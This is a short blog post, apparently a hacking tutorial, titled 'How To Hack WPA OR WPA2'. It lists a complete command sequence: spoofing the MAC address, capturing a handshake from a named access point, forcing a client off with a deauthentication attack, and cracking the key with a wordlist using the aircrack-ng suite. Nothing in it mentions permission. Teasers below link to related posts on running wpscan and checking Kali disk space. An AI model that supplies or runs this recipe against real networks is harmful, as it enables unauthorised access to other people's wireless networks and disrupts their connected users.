Skip to main content

How To Hack WPA OR WPA2 ?

In This Tutorial, Here Is What Was Used

1) MAC address of PC running aircrack-ng suite: 00:0F:B5:88:AC:82
 2) MAC address of the wireless client using WPA2 OR WPA: 00:0F:B5:FD:FB:C2
 3) BSSID (MAC address of access point): 00:14:6C:7E:40:80
 4) ESSID (Wireless network name): teddy
 5) Access point channel: 9
 6) Wireless interface: wlan0/mon0


Now Open Terminal And Start Hacking With This

  • airmon-ng stop wlan0

  • ifconfig wlan0 down

  • macchanger --mac 00:11:22:33:44:55 wlan0

  • ifconfig wlan0 up

  • airmon-ng start wlan0

  • airodump-ng mon0

  • airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk mon0

  • aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 mon0


  • aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap




And You Have Done This :)

Comments

Popular posts from this blog

Wordpress hacking - How to install / run wpscan on windows xp / windows 7 / windows 10

HOW TO RUN WPSCAN ON WINDOWS Byrockstardevil Requirements: rubyinstaller Development Kit for rubyinstaller curl DLL for windows : libcurl.dll 1 - install rubyinstaller you must have Ruby 2.2.3 version . download links here : http://rubyinstaller.org/downloads/ for more info : https://github.com/oneclick/rubyinstaller/wiki 2 - install Development Kit for rubyinstaller download link : http://rubyinstaller.org/downloads/ how to install : https://github.com/oneclick/rubyinstaller/wiki/Development-Kit if you face that problem  "unknown encoding name -  (ArgumentError)" just type "chcp 1252" in cmd and hit enter 3 - install libcurl.dll A - Download libcurl.dll from : http://www.confusedbycode.com/curl/ B - copy libcurl.dll copy  libcurl.dll into ruby bin folder or wpscan folder and make sure to add it to your PATH. I also added .DLL to PATHEXT ex : C:\Ruby21-x64\bin\ you can visit : http://www.computerhope.com/issues/ch000549.htm to know to set the p...

Check Disk space in Kali Linux

After installing Kali Linux on hard drive or on virtual machine, we may have come across with a warning message of " Low Disk usage ". It happens when we allocate insufficient disk space during partition for kali linux or else when we do a regular "update" and "upgrade" of patches or downloading softwares. Kali Linux comes with a graphical built-in tool, i.e. Disk Usage Analyzer . This tool helps you to check the disk space usage. There are other options too, to check usage as per file system. If you need to check from terminal(for non-gui users), then there are two classic commands available for every linux distros, i.e.  (a) df : Report file system disk space usage (b) du : Estimate file space usage df command is used to check free disk space. You can type df -h or df -k to list free disk space. It displays statistics about the amount of free disk space on the specified file system or on the file system of which file is a part. Values are displayed in...